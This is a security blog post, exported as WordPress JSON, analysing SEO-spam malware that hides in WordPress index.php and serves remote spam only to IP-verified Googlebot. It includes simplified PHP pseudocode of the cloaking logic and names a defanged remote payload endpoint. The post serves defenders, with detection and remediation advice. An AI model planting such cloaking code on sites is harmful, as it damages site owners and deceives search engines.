{"id":76,"date":"2026-01-13T00:00:00","date_gmt":"2026-01-12T23:00:00","guid":{"rendered":"https:\/\/helloblog.io\/cs\/kdyz-malware-krmi-googlebot-selektivni-cloaking-asn-cidr-wordpress\/"},"modified":"2026-01-20T06:32:57","modified_gmt":"2026-01-20T05:32:57","slug":"kdyz-malware-krmi-googlebot-selektivni-cloaking-asn-cidr-wordpress","status":"publish","type":"post","link":"https:\/\/helloblog.io\/cs\/kdyz-malware-krmi-googlebot-selektivni-cloaking-asn-cidr-wordpress\/","title":{"rendered":"When malware \u201cfeeds\u201d Googlebot: selective cloaking with IP verification via ASN and CIDR in WordPress"},"content":{"rendered":"\n<p>Lately I have been running into an interesting shift in \u201cSEO malware\u201d: it is no longer the aggressive redirect you notice right away. Instead, the attacker quietly modifies the site's entry point (typically <code>index.php<\/code>) and starts deciding who gets which version of the page. Regular users see a clean site. The search engine, however, receives completely different content, often spam or doorway pages, meant to influence the domain's indexing and reputation.<\/p>\n\n\n\n<p>The specific incident described by Sucuri is interesting because the attacker did not identify Googlebot by the <code>User-Agent<\/code> header alone (which is easy to spoof), but also checked whether the visitor's IP address really belongs to Google's IP ranges. 
And it did so in a very technical way: with a list of ASN ranges in CIDR notation and bitwise operations, including IPv6 support.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">What was compromised: WordPress <code>index.php<\/code> as the \u201cgatekeeper\u201d<\/h2>\n\n\n\n<p>In the described case, the injected code sat directly in WordPress's main <code>index.php<\/code>. For the attacker this is an ideal spot: most requests pass through this file, and for an \u201cuninteresting\u201d visitor the script can quietly hand control over to the standard WordPress bootstrap.<\/p>\n\n\n\n<p>The result is classic cloaking: Google sees different content than a human does. The implementation, however, is far more selective and harder to uncover with ordinary manual testing.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1360\" height=\"636\" src=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/IP-Verified-Conditional-Logic.png\" alt=\"Diagram of selective content delivery with IP verification (IP-verified conditional logic)\" class=\"wp-image-70\" srcset=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/IP-Verified-Conditional-Logic.png 1360w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/IP-Verified-Conditional-Logic-300x140.png 300w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/IP-Verified-Conditional-Logic-1024x479.png 1024w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/IP-Verified-Conditional-Logic-768x359.png 768w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/IP-Verified-Conditional-Logic-400x187.png 400w\" sizes=\"auto, (max-width: 1360px) 100vw, 1360px\" \/><figcaption class=\"wp-element-caption\">The attacker decides, based on the visitor's identity, whether to show the clean site or the remote payload. \u2014 <em>Source: Sucuri Blog<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Why a <code>User-Agent<\/code> check is not enough and why attackers reach for ASNs<\/h2>\n\n\n\n<p><code>User-Agent<\/code> is a text string sent by the client (a browser or a crawler) in the HTTP request. Websites commonly use it for analytics, personalization or compatibility. From the attacker's point of view, though, it is only a first filter, and above all it is trivially spoofable.<\/p>\n\n\n\n<p>That is why a second sieve followed in this incident: verifying that the IP address really belongs to Google's infrastructure. In practice, the attacker had a list of IP ranges associated with Google's ASN (Autonomous System Number) \u201chardwired\u201d into the code. You can think of an ASN as an organization's identity on the internet: it groups the IP addresses that the organization operates.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">CIDR in a nutshell (and why it is practical for malware)<\/h3>\n\n\n\n<p>CIDR (Classless Inter-Domain Routing) is a notation for a range of IP addresses, typically in the form <code>192.168.1.0\/24<\/code>. Instead of listing every address, it states how large the block is. 
For the attacker this is ideal: it is enough to store a few dozen or a few hundred CIDR ranges and test whether the visitor's IP falls into any of them.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1332\" height=\"620\" src=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/CIDR-format.png\" alt=\"Example of the CIDR format for defining IP address ranges\" class=\"wp-image-71\" srcset=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/CIDR-format.png 1332w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/CIDR-format-300x140.png 300w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/CIDR-format-1024x477.png 1024w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/CIDR-format-768x357.png 768w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/CIDR-format-400x186.png 400w\" sizes=\"auto, (max-width: 1332px) 100vw, 1332px\" \/><figcaption class=\"wp-element-caption\">CIDR notation expresses a block of addresses compactly, without listing them by hand. \u2014 <em>Source: Sucuri Blog<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">What is \u201cnew\u201d about this attack: bitwise range validation and IPv6<\/h2>\n\n\n\n<p>Many cloaking scripts do a primitive check along the lines of \u201cdoes the <code>User-Agent<\/code> contain the string Googlebot?\u201d. Here the attacker went further: the IP address was verified mathematically, so that it had to fall exactly within a network block. 
For IPv4 it used bitwise operations (AND with the netmask), a robust test that is commonly used in networking tools as well.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#24292e\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><pre class=\"shiki github-dark\" style=\"background-color:#24292e;color:#e1e4e8\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color:#F97583\">&#x3C;?<\/span><span style=\"color:#79B8FF\">php<\/span><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">\/\/ Pseudocode \/ simplified outline of the logic from the incident:<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">$userAgent <\/span><span style=\"color:#F97583\">=<\/span><span style=\"color:#E1E4E8\"> $_SERVER[<\/span><span style=\"color:#9ECBFF\">'HTTP_USER_AGENT'<\/span><span style=\"color:#E1E4E8\">] <\/span><span style=\"color:#F97583\">??<\/span><span style=\"color:#9ECBFF\"> ''<\/span><span style=\"color:#E1E4E8\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">$ip        <\/span><span style=\"color:#F97583\">=<\/span><span style=\"color:#E1E4E8\"> $_SERVER[<\/span><span style=\"color:#9ECBFF\">'REMOTE_ADDR'<\/span><span style=\"color:#E1E4E8\">] <\/span><span style=\"color:#F97583\">??<\/span><span style=\"color:#9ECBFF\"> ''<\/span><span style=\"color:#E1E4E8\">;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">\/\/ 1) First filter: User-Agent (easily spoofed)<\/span><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">$isGoogleUA <\/span><span style=\"color:#F97583\">=<\/span><span style=\"color:#79B8FF\"> preg_match<\/span><span style=\"color:#E1E4E8\">(<\/span><span style=\"color:#9ECBFF\">'~Googlebot|Google-InspectionTool|Google-Site-Verification~i'<\/span><span style=\"color:#E1E4E8\">, $userAgent);<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">\/\/ 2) Second filter: the IP must fall within the Google ASN ranges in CIDR<\/span><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">\/\/ (in the incident the list was extensive and hardwired directly in the file)<\/span><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">$isGoogleIP <\/span><span style=\"color:#F97583\">=<\/span><span style=\"color:#B392F0\"> ip_in_cidr_ranges<\/span><span style=\"color:#E1E4E8\">($ip, $googleCidrs);<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color:#F97583\">if<\/span><span style=\"color:#E1E4E8\"> ($isGoogleUA <\/span><span style=\"color:#F97583\">&#x26;&#x26;<\/span><span style=\"color:#E1E4E8\"> $isGoogleIP) {<\/span><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">    \/\/ 3) For a verified bot, fetch the remote content and send it as \u201cnative\u201d HTML<\/span><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">    $payload <\/span><span style=\"color:#F97583\">=<\/span><span style=\"color:#B392F0\"> curl_fetch<\/span><span style=\"color:#E1E4E8\">(<\/span><span style=\"color:#9ECBFF\">'hxxps:\/\/amp-samaresmanor[.]pages[.]dev'<\/span><span style=\"color:#E1E4E8\">);<\/span><\/span>\n<span class=\"line\"><span style=\"color:#F97583\">    if<\/span><span style=\"color:#E1E4E8\"> ($payload) {<\/span><\/span>\n<span class=\"line\"><span style=\"color:#79B8FF\">        echo<\/span><span style=\"color:#E1E4E8\"> $payload;<\/span><\/span>\n<span class=\"line\"><span style=\"color:#F97583\">        exit<\/span><span style=\"color:#E1E4E8\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">    }<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">    \/\/ 4) Fail-safe: if the payload fails, do not show the bot a broken page<\/span><\/span>\n<span class=\"line\"><span style=\"color:#79B8FF\">    header<\/span><span style=\"color:#E1E4E8\">(<\/span><span style=\"color:#9ECBFF\">'Location: \/home\/'<\/span><span style=\"color:#E1E4E8\">);<\/span><\/span>\n<span class=\"line\"><span style=\"color:#F97583\">    exit<\/span><span style=\"color:#E1E4E8\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">}<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">\/\/ 5) For regular users: standard WordPress<\/span><\/span>\n<span class=\"line\"><span style=\"color:#F97583\">require_once<\/span><span style=\"color:#79B8FF\"> __DIR__<\/span><span style=\"color:#F97583\"> .<\/span><span style=\"color:#9ECBFF\"> '\/wp-blog-header.php'<\/span><span style=\"color:#E1E4E8\">;<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<p>The key part is the \u201cIP \u2208 CIDR range\u201d check. Sucuri's analysis mentions logic in the style of a bitwise comparison (for IPv4): in principle, both the IP address and the network address are \u201ctrimmed\u201d by the netmask and then compared. The script also accounted for IPv6, a detail that older malware often ignores, which makes that older malware easier to detect.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1420\" height=\"734\" src=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Bitwise-IP-Range-Validation.png\" alt=\"Diagram of IP range validation using bitwise operations\" class=\"wp-image-72\" srcset=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Bitwise-IP-Range-Validation.png 1420w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Bitwise-IP-Range-Validation-300x155.png 300w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Bitwise-IP-Range-Validation-1024x529.png 1024w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Bitwise-IP-Range-Validation-768x397.png 768w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Bitwise-IP-Range-Validation-400x207.png 400w\" sizes=\"auto, (max-width: 1420px) 100vw, 1420px\" \/><figcaption class=\"wp-element-caption\">Instead of string matching, this is exact network math over the IP and the netmask. 
\u2014 <em>Source: Sucuri Blog<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Payload delivery: cURL and remote content as a \u201cnative\u201d page<\/h2>\n\n\n\n<p>After successfully verifying the identity (Google <code>User-Agent<\/code> + IP in Google's ranges), the malware fetched content from an external endpoint via cURL and wrote it straight into the response. From the crawler's point of view, it looks as if the spam\/doorway content were hosted directly by the compromised site.<\/p>\n\n\n\n<p>The incident mentions a specific domain, <code>amp-samaresmanor[.]pages[.]dev<\/code> (the sources state that at the time of writing it was blocklisted by selected security vendors). The important point is that this type of campaign can rotate endpoints, so blocking a single domain on its own is not a systematic fix.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1444\" height=\"836\" src=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Remote-Payload-Execution-via-cURL.png\" alt=\"Diagram of fetching the remote payload via cURL and inserting it into the page\" class=\"wp-image-73\" srcset=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Remote-Payload-Execution-via-cURL.png 1444w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Remote-Payload-Execution-via-cURL-300x174.png 300w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Remote-Payload-Execution-via-cURL-1024x593.png 1024w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Remote-Payload-Execution-via-cURL-768x445.png 768w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Remote-Payload-Execution-via-cURL-400x232.png 400w\" sizes=\"auto, (max-width: 1444px) 100vw, 1444px\" \/><figcaption class=\"wp-element-caption\">The bot receives content from an external source that poses as part of the site. \u2014 <em>Source: Sucuri Blog<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Filtering the Google ecosystem: it is not just \u201cGooglebot\u201d<\/h2>\n\n\n\n<p>Another detail that makes sense: the attacker did not target only the string \u201cGooglebot\u201d. The filter also included various identifiers related to inspection tools, site verification and API crawlers. The goal is clear: to make sure the planted content gets into the index and also passes Google's internal checks.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1682\" height=\"554\" src=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering.png\" alt=\"Example of User-Agent filtering in the malware for various Google crawlers and tools\" class=\"wp-image-74\" srcset=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering.png 1682w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering-300x99.png 300w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering-1024x337.png 1024w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering-768x253.png 768w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering-1536x506.png 1536w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering-400x132.png 400w\" sizes=\"auto, (max-width: 1682px) 100vw, 1682px\" \/><figcaption class=\"wp-element-caption\">A broader list of User-Agents increases the chance that the spam passes both indexing and verification. 
\u2014 <em>Source: Sucuri Blog<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Decision logic and logging: the attacker wants feedback<\/h2>\n\n\n\n<p>This is not a \u201cthrowaway\u201d script. According to the description, the attacker also built in error handling and logging, to see when the payload was served successfully and when, conversely, someone tried to spoof a Google <code>User-Agent<\/code> but the IP did not match.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n\n<li>Legitimate bot (UA + IP match): serves the remote content; if the fetch fails, redirects to <code>\/home\/<\/code> so that Google does not see an error.<\/li>\n\n\n<li>Fake bot (UA matches, IP does not): logs the attempt and redirects to legitimate content to make analysis harder.<\/li>\n\n\n<li>Regular users: typically see the standard site immediately (or are redirected to a \u201cclean\u201d landing page).<\/li>\n\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1694\" height=\"680\" src=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging.png\" alt=\"Decision tree of the malware: User-Agent check, IP check, payload fetch, fallback and logging\" class=\"wp-image-75\" srcset=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging.png 1694w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging-300x120.png 300w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging-1024x411.png 1024w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging-768x308.png 768w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging-1536x617.png 1536w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging-400x161.png 400w\" sizes=\"auto, (max-width: 1694px) 100vw, 1694px\" \/><figcaption class=\"wp-element-caption\">Multiple layers of checks minimize the chance that you notice the problem during an ordinary visit. \u2014 <em>Source: Sucuri Blog<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Why this mainly affects SEO (and why it is a problem for developers too)<\/h2>\n\n\n\n<p>The impact is primarily on reputation and SEO: the site starts serving the search engine something unrelated to it. The consequences tend to be severe, ranging from worse search results to blacklisting or deindexing. At the same time, such an attack is detected late, because during a manual check the site owner sees \u201ceverything in order\u201d.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Warning signs: what to check first<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n\n<li>Odd results in Google (unexpected title\/description, foreign-language spam, strange landing pages).<\/li>\n\n\n<li>Recently modified core files, especially <code>index.php<\/code> and other entry points.<\/li>\n\n\n<li>Suspicious external URLs in the code and in server logs (e.g. calls to unknown domains).<\/li>\n\n\n<li>Unexpected log entries (redirects, cURL requests, \u201cfake bot\u201d messages and the like).<\/li>\n\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">How it works in relation to WordPress core files<\/h2>\n\n\n\n<p>From the WordPress perspective, it is interesting how the attacker balances malicious logic against keeping the site functional. In the described variant, the malware also made use of standard files:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n\n<li><code>wp-load.php<\/code>: including it \u201cboots\u201d the WordPress environment (configuration, DB connection, constants), which opens the door to further options for the attacker.<\/li>\n\n\n<li><code>wp-blog-header.php<\/code>: the typical ending of a clean <code>index.php<\/code>; if the script decides not to serve the payload, it hands control over to the normal rendering of the site.<\/li>\n\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Remediation and prevention: what actually has an effect<\/h2>\n\n\n\n<p>With compromises like this, it is important to clean up systematically, not just \u201cdelete one suspicious thing\u201d. 
The source itself recommends the following steps:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n\n<li>Remove unknown files\/directories and restore modified files to a clean state (ideally from a verified source \/ package).<\/li>\n\n\n<li>Review the users in WordPress and remove suspicious administrators (typically a \u201chelper\u201d account created by the attacker).<\/li>\n\n\n<li>Reset credentials: WordPress admin, FTP\/SFTP, hosting panel, database.<\/li>\n\n\n<li>Check your own workstation (AV\/malware scan); a compromise often starts with stolen credentials.<\/li>\n\n\n<li>Keep WordPress, plugins and themes up to date.<\/li>\n\n\n<li>Deploy a WAF (Web Application Firewall); it helps block communication with known malicious endpoints and often also the initial upload of a vulnerable plugin or webshell.<\/li>\n\n<\/ul>\n\n\n\n<div class=\"wp-block-group callout callout-warning is-style-warning is-layout-flow wp-block-group-is-layout-flow\" style=\"border-width:1px;border-radius:8px;padding-top:1rem;padding-right:1.5rem;padding-bottom:1rem;padding-left:1.5rem\">\n\n<h4 class=\"wp-block-heading callout-title\">A practical note on detection<\/h4>\n\n\n<p>If you rely only on manually clicking through the site in a browser, you will easily miss this type of attack. 
It makes sense to monitor file integrity (File Integrity Monitoring) and to regularly review the indexed URLs in Google Search Console.<\/p>\n\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Summary: selective cloaking is no longer \u201cjust a UA string\u201d<\/h2>\n\n\n\n<p>This campaign illustrates a trend well: attackers are moving away from conspicuous tricks and prefer to turn the compromised site into a controlled gateway for content intended for search engines. Verifying Googlebot via ASN\/CIDR and bitwise operations (with IPv6 on top) significantly reduces the chance that the problem shows up during a routine check.<\/p>\n\n\n\n<p>For WordPress developers and administrators, the priority that follows is simple: watch for changes in core files (especially <code>index.php<\/code>), keep track of what is being indexed, and treat the incident as a compromise of the entire installation, not as an isolated \u201cweird redirect\u201d.<\/p>\n\n\n<div class=\"references-section\">\n                <h2>References \/ Sources<\/h2>\n                <ul class=\"references-list\"><li><a href=\"https:\/\/blog.sucuri.net\/2026\/01\/malware-intercepts-googlebot-via-ip-verified-conditional-logic.html\" target=\"_blank\" rel=\"noopener noreferrer\">Malware Intercepts Googlebot via IP-Verified Conditional Logic<\/a><\/li><li><a href=\"https:\/\/blog.sucuri.net\/2026\/01\/google-sees-spam-you-see-your-site-a-cloaked-seo-spam-attack.html\" target=\"_blank\" rel=\"noopener noreferrer\">Google sees spam, you see your site: a cloaked SEO spam attack<\/a><\/li><li><a href=\"https:\/\/www.virustotal.com\/gui\/url\/5a006beedf563c6215a31746d011d13fd4f2561a1bf3b557484c4532b13e1ec6?nocache=1\" target=\"_blank\" rel=\"noopener noreferrer\">VirusTotal URL report<\/a><\/li><li><a href=\"https:\/\/publicwww.com\/websites\/amp-samaresmanor.pages\/\" target=\"_blank\" rel=\"noopener noreferrer\">publicwww.com results for amp-samaresmanor.pages<\/a><\/li><li><a href=\"https:\/\/sucuri.net\/website-firewall\/\" target=\"_blank\" rel=\"noopener noreferrer\">Sucuri Website Firewall<\/a><\/li><li><a href=\"https:\/\/sucuri.net\/malware-detection-scanning\/\" target=\"_blank\" rel=\"noopener noreferrer\">File Integrity Monitoring (Sucuri Malware Detection &amp; Scanning)<\/a><\/li><\/ul>\n            <\/div>","protected":false},"excerpt":{"rendered":"<p>Attackers are increasingly abandoning cheap redirects aimed at everyone. Instead, they target only Googlebot and let regular visitors (and the site owner) see perfectly normal content.<\/p>\n","protected":false},"author":35,"featured_media":69,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[60,59,57,58,10],"class_list":["post-76","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bezpecnost","tag-cloaking","tag-googlebot","tag-malware","tag-seo","tag-wordpress"],"_links":{"self":[{"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/posts\/76","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/users\/35"}],"replies":[{"embeddable":true,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/comments?post=76"}],"version-history":[{"count":1,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/posts\/76\/revisions"}],"predecessor-version":[{"id":99,"href":"https:\/\/helloblog.io\/c
s\/wp-json\/wp\/v2\/posts\/76\/revisions\/99"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/media\/69"}],"wp:attachment":[{"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/media?parent=76"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/categories?post=76"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/tags?post=76"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}